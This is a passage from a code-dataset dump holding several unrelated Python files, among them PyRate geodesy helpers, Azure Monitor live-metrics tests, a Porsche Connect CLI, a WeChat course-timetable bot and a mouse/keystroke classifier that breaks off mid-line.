\"\"\"\n def __init__(self, index, top_left, bottom_right):\n \"\"\"\n :param index: Identifying index of a tile\n :param top_left: Interferogram index of top left of tile\n :param bottom_right: Interferogram index of bottom right of tile\n \"\"\"\n\n self.index = index\n self.top_left = top_left\n self.bottom_right = bottom_right\n self.top_left_y, self.top_left_x = top_left\n self.bottom_right_y, self.bottom_right_x = bottom_right\n\n def __str__(self):\n return \"Convenience Tile class containing tile co-ordinates\"\n\n\ndef copytree(src, dst, symlinks=False, ignore=None):\n # pylint: disable=line-too-long\n \"\"\"\n Copy contents of src dir into dst dir\n copied from: http://stackoverflow.com/questions/1868714/how-do-i-copy-an-entire-directory-of-files-into-an-existing-directory-using-pyth?lq=1\n \n :param src: Source directory to copy from\n :param dst: Destination directory to copy to, created if does not exist\n :param symlinks: Whether to copy symlink or not\n :param ignore: xxxx\n \"\"\"\n # pylint: disable=invalid-name\n if not os.path.exists(dst): # 
pragma: no cover\n os.makedirs(dst)\n shutil.copystat(src, dst)\n lst = os.listdir(src)\n if ignore:\n excl = ignore(src, lst)\n lst = [x for x in lst if x not in excl]\n for item in lst:\n s = os.path.join(src, item)\n d = os.path.join(dst, item)\n if symlinks and os.path.islink(s): # pragma: no cover\n if os.path.lexists(d):\n os.remove(d)\n os.symlink(os.readlink(s), d)\n try:\n st = os.lstat(s)\n mode = stat.S_IMODE(st.st_mode)\n os.lchmod(d, mode)\n except AttributeError:\n pass # lchmod not available\n elif os.path.isdir(s): # pragma: no cover\n copytree(s, d, symlinks, ignore)\n else:\n shutil.copy2(s, d)\n\n\ndef pre_prepare_ifgs(ifg_paths, params):\n \"\"\"\n xxxx\n\n :param ifg_paths: List of interferogram paths\n :param params: Parameters dictionary\n \n :return ifgs: List of interferogram instances\n \"\"\"\n ifgs = [Ifg(p) for p in ifg_paths]\n for i in ifgs:\n if not i.is_open:\n i.open(readonly=False)\n nan_and_mm_convert(i, params)\n log.info('Opened ifg for reading')\n return ifgs\n\n\ndef nan_and_mm_convert(ifg, params):\n \"\"\"\n xxxx\n \n :param ifg: Interferogram class instance\n :param params: Parameters dictionary\n \n :return xxxx\n \"\"\"\n nan_conversion = params[cf.NAN_CONVERSION]\n if nan_conversion: # nan conversion happens here in networkx mst\n # if not ifg.nan_converted:\n ifg.nodata_value = params[cf.NO_DATA_VALUE]\n ifg.convert_to_nans()\n if not ifg.mm_converted:\n ifg.convert_to_mm()\n\n\ndef cell_size(lat, lon, x_step, y_step):\n # pylint: disable=invalid-name\n \"\"\"\n Collection of geodesy/pyproj algorithms for PyRate.\n This function depends on PyProj/PROJ4 to implement the function\n llh2local.m used in Matlab Pirate.\n Converts X|Y_STEP in degrees to X & Y cell length/width in metres.\n \n :param lat: Latitude in degrees\n :param lon: Longitude in degrees\n :param x_step: Horizontal step size in degrees\n :param y_step: Vertical step size in degrees\n \n :return xxxx\n \"\"\"\n if lat > 84.0 or lat < -80:\n msg = \"No UTM zone for polar region: > 84 degrees N or < 80 degrees S\"\n raise ValueError(msg)\n\n zone = utm_zone(lon)\n p0 = pyproj.Proj(proj='latlong', ellps='WGS84')\n p1 = pyproj.Proj(proj='utm', zone=zone, ellps='WGS84')\n assert p0.is_latlong()\n assert not p1.is_latlong()\n\n x0, y0 = pyproj.transform(p0, p1, lon, lat)\n x1, y1 = pyproj.transform(p0, p1, lon + x_step, lat + y_step)\n return tuple(abs(e) for e in (x1 - x0, y1 - y0))\n\n\ndef utm_zone(longitude):\n \"\"\"\n Returns basic UTM zone for given longitude in degrees. 
Currently does NOT\n    handle the sub-zoning around Scandinavian countries.\n    See http://www.dmap.co.uk/utmworld.htm\n    \n    :param longitude: Longitude in degrees\n    \n    :return: UTM zone number for the given longitude\n    \"\"\"\n    if longitude == 180:\n        return 60.0\n    return floor((longitude + 180) / 6.0) + 1\n\n\nclass PrereadIfg:\n    \"\"\"\n    Convenience class for handling pre-calculated interferogram parameters.\n    \"\"\"\n    # pylint: disable=too-many-arguments\n    # pylint: disable=too-many-instance-attributes\n    def __init__(self, path, nan_fraction, master, slave, time_span,\n                 nrows, ncols, metadata):\n        self.path = path\n        self.nan_fraction = nan_fraction\n        self.master = master\n        self.slave = slave\n        self.time_span = time_span\n        self.nrows = nrows\n        self.ncols = ncols\n        self.shape = (nrows, ncols)\n        self.metadata = metadata\n\n\ndef prepare_ifg(ifg_path, params):\n    \"\"\"\n    Open an interferogram file and apply NaN and millimetre conversion.\n    \n    :param ifg_path: Interferogram path\n    :param params: Configuration dictionary\n    \n    :return ifg: Interferogram class instance\n    \"\"\"\n    ifg = Ifg(ifg_path)\n    ifg.open()\n    nan_and_mm_convert(ifg, params)\n    return ifg\n\n\ndef save_numpy_phase(ifg_paths, tiles, params):\n    \"\"\"\n    Save interferogram phase data as numpy array.\n\n    :param ifg_paths: List of strings corresponding to interferogram paths\n    :param tiles: List of Shared.Tile instances\n    :param params: Configuration dictionary\n\n    :return: None; tiled phase data is saved as .npy files under params[cf.TMPDIR]\n    \"\"\"\n    process_ifgs = mpiops.array_split(ifg_paths)\n    outdir = params[cf.TMPDIR]\n    if not os.path.exists(outdir):\n        mkdir_p(outdir)\n    for ifg_path in process_ifgs:\n        ifg = Ifg(ifg_path)\n        ifg.open()\n        phase_data = ifg.phase_data\n        bname = basename(ifg_path).split('.')[0]\n        for t in tiles:\n            p_data = phase_data[t.top_left_y:t.bottom_right_y,\n                                t.top_left_x:t.bottom_right_x]\n            phase_file = 'phase_data_{}_{}.npy'.format(bname, t.index)\n            np.save(file=join(outdir, phase_file),\n                    arr=p_data)\n        ifg.close()\n    mpiops.comm.barrier()\n\n\ndef get_projection_info(ifg_path):\n    \"\"\"\n    Return projection information of interferogram.\n\n    :param ifg_path: Interferogram path\n    \n    :return: Tuple of (geotransform, metadata, projection WKT) for the dataset\n    \"\"\"\n    ds = gdal.Open(ifg_path)\n    md = ds.GetMetadata() # get metadata for writing on output tifs\n    gt = ds.GetGeoTransform() # get geographical bounds of data\n    wkt = ds.GetProjection() # get projection of data\n    ds = None # close dataset\n    return gt, md, wkt\n\n\ndef warp_required(xlooks, ylooks, crop):\n    \"\"\"\n    Returns True if params show rasters need to be cropped and/or resized.\n\n    :param xlooks: Resampling/multi-looking in x dir\n    :param ylooks: Resampling/multi-looking in y dir\n    :param crop: Interferogram crop option\n    \n    :return: True if cropping and/or resampling is required, otherwise False\n    \"\"\"\n\n    if xlooks > 1 or ylooks > 1:\n        return True\n\n    if crop is None:\n        return False\n\n    return True\n\n\ndef output_tiff_filename(inpath, outpath):\n    \"\"\"\n    Return the geotiff filename for a given input filename.\n    \n    :param inpath: path of input file location\n    :param outpath: path of output file location\n    \n    :return: Geotiff filename for a given file.\n    \"\"\"\n    fname, ext = os.path.basename(inpath).split('.')\n    return os.path.join(outpath, fname + '_' + ext + '.tif')\n","sub_path":"pyrate/shared.py","file_name":"shared.py","file_ext":"py","file_size_in_byte":34276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"275859405","text":"'''7. Write a program to accept a number from the user and determine the sum of digits of that number. 
Repeat the operation until the sum gets to be a single digit number.'''\n\ndef find_sum(num):\n    # Digital root: keep summing digits until a single-digit value remains.\n    total = 0\n    while num > 0 or total > 9:\n        if num == 0:\n            num = total\n            total = 0\n        total += num % 10\n        num = num // 10\n    return total\nnum = int(input(\"enter the number:\"))\nres = find_sum(num)\nprint(res)\n","sub_path":"M1_q/sum2.py","file_name":"sum2.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"519785037","text":"while True:\n    item = self.findNearest(self.findItems())\n    if item:\n        if self.isReady(\"jump\"):\n            self.jumpTo({'x': item.pos.x, 'y': item.pos.y})\n        else:\n            self.move(item.pos)\n    if self.gold > self.costOf(\"soldier\"):\n        self.summon(\"soldier\")\n    enemy = self.findNearest(self.findEnemies())\n    if enemy:\n        soldiers = self.findFriends()\n        soldierIndex = 0\n        while soldierIndex < len(soldiers):\n            soldier = soldiers[soldierIndex]\n            self.command(soldier, \"attack\", enemy)\n            soldierIndex += 1\n","sub_path":"Mountain/CloudripBrawl/CloudripBrawl.py","file_name":"CloudripBrawl.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"638789048","text":"import math\n\ndef circle_calc(radius):\n    # Compute area, circumference and diameter for a circle of the given radius.\n    area = math.pi * (radius**2)\n    circumference = 2*math.pi*radius\n    diameter = 2*radius\n    return round(area,2), round(circumference,2), diameter\n\ndef main():\n    in_radius = float(input(\"Enter radius : \"))\n    results = circle_calc(in_radius)\n    print(f'Area : {results[0]}, Circumference : {results[1]}, Diameter: {results[2]}')\n\nif __name__ == '__main__':\n    main()\n","sub_path":"CicleCalc.py","file_name":"CicleCalc.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"486099101","text":"# Copyright (c) Microsoft Corporation. 
All rights reserved.\n# Licensed under the MIT License.\n\nimport time\nimport unittest\nfrom unittest import mock\n\nfrom opentelemetry import metrics\nfrom opentelemetry.sdk.metrics import Counter, MeterProvider\n\nfrom azure_monitor.sdk.auto_collection.live_metrics.exporter import (\n LiveMetricsExporter,\n)\nfrom azure_monitor.sdk.auto_collection.live_metrics.manager import (\n LiveMetricsManager,\n LiveMetricsPing,\n LiveMetricsPost,\n)\nfrom azure_monitor.sdk.auto_collection.metrics_span_processor import (\n AzureMetricsSpanProcessor,\n)\n\n\n# pylint: disable=protected-access\nclass TestLiveMetricsManager(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n metrics.set_meter_provider(MeterProvider())\n cls._meter = metrics.get_meter(__name__)\n cls._test_metric = cls._meter.create_metric(\n \"testname\", \"testdesc\", \"unit\", int, Counter, [\"environment\"]\n )\n testing_labels = {\"environment\": \"testing\"}\n cls._test_metric.add(5, testing_labels)\n cls._instrumentation_key = \"99c42f65-1656-4c41-afde-bd86b709a4a7\"\n cls._manager = None\n cls._ping = None\n cls._post = None\n cls._span_processor = AzureMetricsSpanProcessor()\n\n @classmethod\n def tearDownClass(cls):\n metrics._METER_PROVIDER = None\n\n def tearDown(self):\n if self._manager:\n self._manager.shutdown()\n self._manager = None\n if self._ping:\n self._ping.shutdown()\n self._ping = None\n if self._post:\n self._post.shutdown()\n self._post = None\n\n def test_constructor(self):\n \"\"\"Test the constructor.\"\"\"\n with mock.patch(\"requests.post\"):\n self._manager = LiveMetricsManager(\n meter=self._meter,\n instrumentation_key=self._instrumentation_key,\n span_processor=self._span_processor,\n )\n self.assertFalse(self._manager._is_user_subscribed)\n self.assertEqual(\n self._manager._instrumentation_key, self._instrumentation_key\n )\n self.assertEqual(self._manager._meter, self._meter)\n self.assertIsNotNone(self._manager._ping)\n\n def test_switch(self):\n \"\"\"Test manager switch between ping and post.\"\"\"\n with mock.patch(\"requests.post\") as request:\n request.return_value = MockResponse(\n 200, None, {\"x-ms-qps-subscribed\": \"true\"}\n )\n self._manager = LiveMetricsManager(\n meter=self._meter,\n instrumentation_key=self._instrumentation_key,\n span_processor=self._span_processor,\n )\n self._manager.interval = 60\n time.sleep(1)\n self._manager.check_if_user_is_subscribed()\n self.assertIsNone(self._manager._ping)\n self.assertIsNotNone(self._manager._post)\n self.assertEqual(\n self._manager._span_processor.is_collecting_documents, True\n )\n self._manager._post.is_user_subscribed = False\n self._manager.check_if_user_is_subscribed()\n self.assertIsNone(self._manager._post)\n self.assertIsNotNone(self._manager._ping)\n self.assertEqual(\n self._manager._span_processor.is_collecting_documents, False\n )\n\n def test_ping_ok(self):\n \"\"\"Test ping send requests to Live Metrics service.\"\"\"\n with mock.patch(\"requests.post\") as request:\n request.return_value = MockResponse(200, None, {})\n self._ping = LiveMetricsPing(\n instrumentation_key=self._instrumentation_key\n )\n self._ping.ping()\n self.assertTrue(request.called)\n self.assertTrue(self._ping.last_request_success_time > 0)\n self.assertTrue(self._ping.last_send_succeeded)\n self.assertFalse(self._ping.is_user_subscribed)\n\n def test_ping_subscribed(self):\n \"\"\"Test ping when user is subscribed.\"\"\"\n with mock.patch(\"requests.post\") as request:\n request.return_value = MockResponse(\n 200, None, 
{\"x-ms-qps-subscribed\": \"true\"}\n )\n self._ping = LiveMetricsPing(\n instrumentation_key=self._instrumentation_key\n )\n self._ping.ping()\n self.assertTrue(self._ping.is_user_subscribed)\n\n def test_ping_error(self):\n \"\"\"Test ping when failure.\"\"\"\n with mock.patch(\"requests.post\") as request:\n request.return_value = MockResponse(400, None, {})\n self._ping = LiveMetricsPing(\n instrumentation_key=self._instrumentation_key\n )\n self._ping.last_request_success_time = time.time() - 60\n self._ping.ping()\n self.assertFalse(self._ping.last_send_succeeded)\n self.assertEqual(self._ping.interval, 60)\n\n def test_post_ok(self):\n \"\"\"Test post send requests to Live Metrics service.\"\"\"\n with mock.patch(\"requests.post\") as request:\n request.return_value = MockResponse(\n 200, None, {\"x-ms-qps-subscribed\": \"false\"}\n )\n self._post = LiveMetricsPost(\n exporter=LiveMetricsExporter(\n self._instrumentation_key,\n span_processor=self._span_processor,\n ),\n meter=self._meter,\n instrumentation_key=self._instrumentation_key,\n )\n self._post.post()\n self.assertTrue(request.called)\n self.assertTrue(self._post.last_request_success_time > 0)\n self.assertTrue(self._post.last_send_succeeded)\n self.assertFalse(self._post.is_user_subscribed)\n\n def test_post_subscribed(self):\n \"\"\"Test post when user is subscribed.\"\"\"\n with mock.patch(\"requests.post\") as request:\n request.return_value = MockResponse(\n 200, None, {\"x-ms-qps-subscribed\": \"true\"}\n )\n self._post = LiveMetricsPost(\n exporter=LiveMetricsExporter(\n self._instrumentation_key,\n span_processor=self._span_processor,\n ),\n meter=self._meter,\n instrumentation_key=self._instrumentation_key,\n )\n self._post.post()\n self.assertTrue(self._post.is_user_subscribed)\n\n def test_post_error(self):\n \"\"\"Test post when failure.\"\"\"\n with mock.patch(\"requests.post\") as request:\n request.return_value = MockResponse(400, None, {})\n self._post = LiveMetricsPost(\n exporter=LiveMetricsExporter(\n self._instrumentation_key,\n span_processor=self._span_processor,\n ),\n meter=self._meter,\n instrumentation_key=self._instrumentation_key,\n )\n self._post.last_request_success_time = time.time() - 61\n self._post.post()\n self.assertFalse(self._post.last_send_succeeded)\n self.assertEqual(self._post.interval, 60)\n\n\n# pylint: disable=invalid-name\nclass MockResponse:\n def __init__(self, status_code, text, headers):\n self.status_code = status_code\n self.text = text\n self.ok = status_code == 200\n self.headers = headers\n","sub_path":"azure_monitor/tests/auto_collection/live_metrics/test_manager.py","file_name":"test_manager.py","file_ext":"py","file_size_in_byte":7491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"301835731","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Jie Wang @ 2021-02-23\nimport base64\nimport librosa\nimport soundfile as sf\nimport os\nfrom math import *\n\n\n# wav_path = '/Users/wangjie/Downloads/corpus/nus-smc-corpus_48/ADIZ/sing/18.wav'\n# rootDir = '/Users/wangjie/Downloads/corpus/nus-smc-corpus_48'\nrootDir = '/workspace/project-nas-10801-sh/datasets/nus_16k'\n# targetDir = '/Users/wangjie/Downloads/corpus/nus-smc-corpus_48/five_second'\ntargetDir = '/workspace/project-nas-10801-sh/datasets/five_seconds'\ndirName, subdirList, _ = next(os.walk(rootDir))\nfor subdir in sorted(subdirList): # 说话人list\n # print(subdir)\n if not os.path.exists(os.path.join(targetDir, subdir)):\n 
os.makedirs(os.path.join(targetDir, subdir))\n    \n    _, _, fileList = next(os.walk(os.path.join(dirName, subdir)))\n    for fileName in sorted(fileList):\n        # print(fileName)\n        # x, fs = sf.read(os.path.join(dirName,subdir,fileName))\n        wav_path = os.path.join(dirName,subdir,fileName)\n        data, samplerate = librosa.load(wav_path, sr=16000)\n        duration = len(data) / samplerate # duration in seconds\n        print(duration)\n        segments = floor(duration / 5)\n        print(segments)\n        for i in range(1, segments + 1):\n            print(i)\n            if i * 5 >= duration:\n                y = data[(i - 1) * 80000:]\n            else:\n                y = data[(i - 1) * 80000: i * 80000]\n            print(y)\n            nn = fileName[:-4] + '_' + str(i)\n            # librosa.output.write_wav('results/' + nn + '.wav', waveform_NOP, sr=16000)\n            save_path = os.path.join(targetDir, subdir)\n            sf.write(os.path.join(save_path, f\"{nn}.wav\"), y, 16000, \"PCM_16\")\n# print(duration)\n# for i in range():\n    # y = data[i : i + 80000]\n# y = data[:80000]\n# i = 19\n# nn = '18' + '_' + str(i)\n# sf.write(os.path.join('results/', f\"{nn}.wav\"), y, 16000, \"PCM_16\")\n\n\n# print(data, samplerate, '{:.2f}s'.format(duration))\n# with open(wav_path, 'rb') as f:\n#     buff = f.read()\n#     buff = buff[:78] + buff[64000:]\n#     # buff = buff[:32078] # crop the audio to the desired length, here 1s (the RIFF header must be included)\n#     buff_str = base64.b64encode(buff).decode()\n#     print(type(buff_str))\n#     buff = base64.b64decode(buff_str)\n#     data, samplerate = librosa.load(io.BytesIO(buff), sr=16000)\n#     print(len(data)) # in this example 1s, i.e. 16000 samples\n#     duration = len(data) / samplerate\n#     print(data, samplerate, '{:.2f}s'.format(duration))\n\n\n","sub_path":"batch_crop.py","file_name":"batch_crop.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"435239741","text":"import argparse\nimport asyncio\nfrom pyporscheconnectapi.connection import Connection\nfrom pyporscheconnectapi.client import Client\nimport sys\nimport logging\nimport json\n\nlogging.basicConfig()\nlogging.root.setLevel(logging.WARNING)\n\n\nasync def main(args):\n    try:\n        with open(args.session_file) as json_file:\n            tokens = json.load(json_file)\n    except FileNotFoundError:\n        tokens = {}\n    except json.decoder.JSONDecodeError:\n        tokens = {}\n\n    conn = Connection(args.email, args.password, tokens=tokens, country=args.country, language=args.language)\n    client = Client(conn)\n\n    if args.command == \"list\":\n        data = await client.getVehicles()\n        print(json.dumps(data, indent=2))\n    else:\n        vins = []\n        if args.vin is not None: vins = [ args.vin ]\n        elif args.all:\n            vehicles = await client.getVehicles()\n            vins = map(lambda v : v['vin'], vehicles)\n        else:\n            sys.exit(\"--vin or --all is required\")\n        for vin in vins:\n            data = {}\n            if args.command == \"overview\":\n                data = await client.getOverview(vin)\n            elif args.command == \"maintenance\":\n                data = await client.getMaintenance(vin)\n            elif args.command == \"summary\":\n                data = await client.getSummary(vin)\n            elif args.command == \"capabilities\":\n                data = await client.getCapabilities(vin)\n            elif args.command == \"position\":\n                data = await client.getPosition(vin)\n            elif args.command == \"emobility\":\n                data = await client.getEmobility(vin, model=args.model, country=args.country, language=args.language, timezone=args.timezone)\n            elif args.command == \"triplongterm\":\n                data = await client.getTripLongTerm(vin, country=args.country, language=args.language)\n            elif args.command == \"tripshortterm\":\n                data = await client.getTripShortTerm(vin, country=args.country, language=args.language)\n            elif args.command == 
\"speedalerts\":\n data = await client.getSpeedAlerts(vin, country=args.country, language=args.language)\n elif args.command == \"theftalerts\":\n data = await client.getTheftAlerts(vin)\n print(json.dumps(data, indent=2))\n\n\n await conn.close()\n with open(args.session_file, 'w', encoding='utf-8') as json_file:\n json.dump(conn.tokens, json_file, ensure_ascii=False, indent=2)\n\ndef cli():\n parser = argparse.ArgumentParser(description='Porsche Connect CLI.')\n parser.add_argument('command', choices=['list', 'overview', 'maintenance', 'summary', 'capabilities', 'emobility',\n 'position', 'triplongterm', 'tripshortterm', 'speedalerts', 'theftalerts'])\n parser.add_argument('-e', '--email', dest='email', required=True)\n parser.add_argument('-p', '--password', dest='password', required=True)\n parser.add_argument('-s', '--sessionfile', dest='session_file', default='.session')\n parser.add_argument('-v', '--vin', dest='vin', default=None)\n parser.add_argument('-m', '--model', dest='model', default=None)\n parser.add_argument('-a', '--all', dest='all', action='store_true')\n parser.add_argument('-c', '--country', dest='country', default='de')\n parser.add_argument('-l', '--language', dest='language', default='DE')\n parser.add_argument('-z', '--timezone', dest='timezone', default='Europe/Stockholm')\n\n args = parser.parse_args()\n\n loop = asyncio.get_event_loop()\n loop.run_until_complete(main(args))\n","sub_path":"pyporscheconnectapi/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":3576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"533546874","text":"__author__ = 'Hex'\n# encoding: utf-8\nfrom models import WxUser,WxKcb,WxXfb\nimport gkdgrab\nimport course\nimport datetime\n\ndef validateWxUser(Wxid):\n #返回数据库中已有的保存的这个微信号个数(理论上不是0就是1)\n return len(WxUser.objects.filter(wxid=Wxid))\n\ndef validateWxKcb(idkey):\n #返回数据库中已有的保存的这个微信的课表数(理论上不是0就是1)\n return len(WxKcb.objects.filter(wxuserId=idkey))\n\ndef validateWxXfb(idkey):\n #返回数据库中已有的保存的这个微信的学分表数(理论上不是0就是1)\n return len(WxXfb.objects.filter(wxuserId=idkey))\n\ndef addWxUser(wxid,name,pwd):\n #向数据库中添加新的user信息\n if validateWxUser(wxid)==0:\n newUser=WxUser(wxid=wxid,username=name,password=pwd)\n newUser.save()\n\ndef deleteWxUser(wxid):\n #向数据库中删除当前user信息,要求传入的wxid必须为string\n if validateWxUser(wxid)!=0:\n newUser=WxUser.objects.get(wxid=wxid)\n newUser.delete()\n\ndef initWxUser(wxid):\n #重置用户密码为123456\n if validateWxUser(wxid)!=0:\n newUser=WxUser.objects.get(wxid=wxid)\n newUser.password='123456'\n newUser.save()\n\ndef updateWxUser(wxid,name,pwd):\n #向数据库中更新user信息\n if validateWxUser(wxid)==1:\n newUser=WxUser.objects.get(wxid=wxid)\n newUser.username=name\n newUser.password=pwd\n newUser.save()\n\ndef UpdateClasses(wxid):\n if validateWxUser(wxid)!=0:\n newUser=WxUser.objects.get(wxid=wxid)\n name=newUser.username\n pwd=newUser.password\n #更新课表信息,包括初次创建\n kcinfo=gkdgrab.gkdgrap_kcb(name,pwd)\n if kcinfo[0]=='error':\n return u'对不起,您绑定的账号信息有误,建议您通过发送格式为 add [空格]邮箱名[空格]密码 的消息来更新您的绑定信息!'\n #return 'error'\n else:\n result=gkdgrab.gkdgrab_kcbparse(kcinfo[0])\n xf=gkdgrab.gkdgrab_xfparse(kcinfo[1])#处理获取到的学分表信息\n #weekNum=datetime.date.today().weekday()+2\n\n i=1\n idkey=WxUser.objects.get(wxid=wxid).id\n\n if validateWxXfb(idkey)==0:\n #创建新的学分表\n newXfb=WxXfb(wxuserId=WxUser.objects.get(wxid=wxid))\n newXfb.save()\n newXfb=WxXfb.objects.get(wxuserId=WxUser.objects.get(wxid=wxid))\n newXfb.yqgx=xf['yqgx']\n newXfb.yqzb=xf['yqzb']\n newXfb.yqzx=xf['yqzx']\n 
newXfb.yqzf=xf['yqzf']\n newXfb.yxgx=xf['yxgx']\n newXfb.yxzb=xf['yxzb']\n newXfb.yxzx=xf['yxzx']\n newXfb.yxzf=xf['yxzf']\n newXfb.hdgx=xf['hdgx']\n newXfb.hdzb=xf['hdzb']\n newXfb.hdzx=xf['hdzx']\n newXfb.hdzf=xf['hdzf']\n newXfb.save()\n\n\n if validateWxKcb(idkey)==0:\n #创建新的课表\n newKcb=WxKcb(wxuserId=WxUser.objects.get(wxid=wxid))\n newKcb.save()\n newKcb=WxKcb.objects.get(wxuserId=WxUser.objects.get(wxid=wxid))\n #testss=''\n while i<8:#周几\n cla={}\n respon=\"\"\"您的课程安排如下:\n\"\"\"\n for toco in result:\n if toco.day==i:#当天\n\n cla[toco.period]=toco.name+\"\"\"\n 【\"\"\"+toco.classroom+\"】\"\n\n if cla.has_key(1):\n respon=respon+\"\"\"第1节8:30\"\"\"+cla[1]+\"\"\"\n\"\"\"\n if cla.has_key(2):\n respon=respon+\"\"\"第2节9:20\"\"\"+cla[2]+\"\"\"\n\"\"\"\n if cla.has_key(3):\n respon=respon+\"\"\"第3节10:30\"\"\"+cla[3]+\"\"\"\n\"\"\"\n if cla.has_key(4):\n respon=respon+\"\"\"第4节11:20\"\"\"+cla[4]+\"\"\"\n\"\"\"\n if cla.has_key(5):\n respon=respon+\"\"\"第5节13:30\"\"\"+cla[5]+\"\"\"\n\"\"\"\n if cla.has_key(6):\n respon=respon+\"\"\"第6节14:20\"\"\"+cla[6]+\"\"\"\n\"\"\"\n if cla.has_key(7):\n respon=respon+\"\"\"第7节15:20\"\"\"+cla[7]+\"\"\"\n\"\"\"\n if cla.has_key(8):\n respon=respon+\"\"\"第8节16:10\"\"\"+cla[8]+\"\"\"\n\"\"\"\n if cla.has_key(9):\n respon=respon+\"\"\"第9节19:00\"\"\"+cla[9]+\"\"\"\n\"\"\"\n if cla.has_key(10):\n respon=respon+\"\"\"第10节19:50\"\"\"+cla[10]+\"\"\"\n\"\"\"\n if cla.has_key(11):\n respon=respon+\"\"\"第11节20:50\"\"\"+cla[11]+\"\"\"\n\"\"\"\n res=respon\n #testss=testss+res\n\n if i==1:\n newKcb.z1=res\n elif i==2:\n newKcb.z2=res\n elif i==3:\n newKcb.z3=res\n elif i==4:\n newKcb.z4=res\n elif i==5:\n newKcb.z5=res\n elif i==6:\n newKcb.z6=res\n elif i==7:\n newKcb.z7=res\n\n\n newKcb.save()\n\n i=i+1\n #return 'success'\n return '恭喜您,导入课表成功!对于您在课程网站的一切信息都属于您的个人隐私,请相信小助手是不会去查看的。同时也建议您设置与其他常用网站不同的课程网站密码,尽管小助手也不会去尝试获取或者记住它。谢谢您的使用!'\n else:\n return '您可能还没有绑定账号信息,请按照如下格式回复进行绑定:add[空格]课程网站登录邮箱[空格]密码'\n\n\ndef todayClasses(wxid):\n if validateWxUser(wxid)==0:\n return u\"很抱歉,您还没有注册您的个人信息!请按照如下格式回复您的课程网站邮箱以及密码:add[空格]课程网站登录邮箱[空格]密码\"\n if len(WxKcb.objects.filter(wxuserId=WxUser.objects.get(wxid=wxid)))==0:\n return u\"很抱歉,您可能需要更新您的课程表信息,请回复如下单词:update\"\n wxkcb=WxKcb.objects.get(wxuserId=WxUser.objects.get(wxid=wxid))\n weekNum=datetime.date.today().weekday()+1\n if weekNum==1:\n return wxkcb.z1\n if weekNum==2:\n return wxkcb.z2\n if weekNum==3:\n return wxkcb.z3\n if weekNum==4:\n return wxkcb.z4\n if weekNum==5:\n return wxkcb.z5\n if weekNum==6:\n return wxkcb.z6\n if weekNum==7:\n return wxkcb.z7\n\n\ndef tomorrowClasses(wxid):\n if validateWxUser(wxid)==0:\n return u\"很抱歉,您还没有注册您的个人信息!请按照如下格式回复您的课程网站邮箱以及密码:add[空格]课程网站登录邮箱[空格]密码\"\n if len(WxKcb.objects.filter(wxuserId=WxUser.objects.get(wxid=wxid)))==0:\n return u\"很抱歉,您可能需要更新您的课程表信息,请回复如下单词:update\"\n wxkcb=WxKcb.objects.get(wxuserId=WxUser.objects.get(wxid=wxid))\n weekNum=datetime.date.today().weekday()+1\n if weekNum==1:\n return wxkcb.z2\n if weekNum==2:\n return wxkcb.z3\n if weekNum==3:\n return wxkcb.z4\n if weekNum==4:\n return wxkcb.z5\n if weekNum==5:\n return wxkcb.z6\n if weekNum==6:\n return wxkcb.z7\n if weekNum==7:\n return wxkcb.z1\n\n\ndef nowXuefen(wxid):\n if validateWxUser(wxid)==0:\n return u\"很抱歉,您还没有注册您的个人信息!请按照如下格式回复您的课程网站邮箱以及密码:add[空格]课程网站登录邮箱[空格]密码\"\n if len(WxXfb.objects.filter(wxuserId=WxUser.objects.get(wxid=wxid)))==0:\n return u\"很抱歉,您可能需要更新您的学分表信息,请回复如下单词:update\"\n wxfb=WxXfb.objects.get(wxuserId=WxUser.objects.get(wxid=wxid))\n 
res=u\"您好,您的学分情况如下,毕业要求的总学分为:%s,已选%s(包括未出成绩),已修%s;要求的公选为:%s,已选%s,已修%s;要求的专业必修为:%s,已选%s,已修%s;要求的专业选修为:%s,已选%s,已修%s.公共必修未显示,此信息仅供参考,不代表其具有准确性,具体以教务系统为准。\"\n res=res%(wxfb.yqzf,wxfb.yxzf,wxfb.hdzf,wxfb.yqgx,wxfb.yxgx,wxfb.hdgx,wxfb.yqzb,wxfb.yxzb,wxfb.hdzb,wxfb.yqzx,wxfb.yxzx,wxfb.hdzx)\n return res\n\n\n\n\n\n\n\n","sub_path":"wxgkd/kcb/kcbfunc.py","file_name":"kcbfunc.py","file_ext":"py","file_size_in_byte":8350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"259939881","text":"import pandas as pd\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom xgboost import XGBClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score, precision_score,recall_score,f1_score\nfrom sklearn.metrics import classification_report, confusion_matrix\nimport pickle\nfrom sklearn.neighbors import KNeighborsClassifier\n\n# from sklearn.svm import SVC\n\nkeyboard = pd.read_csv(\"/home/senthuran/Desktop/Movies/MouseKey.csv\")\nprint(keyboard.shape)\nprint(keyboard.head())\nX = keyboard.drop('username', axis=1)\ny = keyboard['username']\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.20)\n\nmodel = OneVsRestClassifier(KNeighborsClassifier())\nmodel.fit(X_train, y_train)\n\n# save the model to disk\nfilename = 'MouseKey1.sav'\npickle.dump(model, open(filename, 'wb'))\n\nnew_input= pd.DataFrame({\"maxPositiveAcc\":[7247], \"maxNegativeAcc\":[-8857], \"maxSpeed\":[886], \"totalX\":[1029], \"totalY\":[642], \"total\":[1340.513905],\"leftClick\": [6], \"rightClick\":[0], \"mouseDown\":[3], \"mouseUp\":[3], \"usernameWPS\":[0.003121452894], 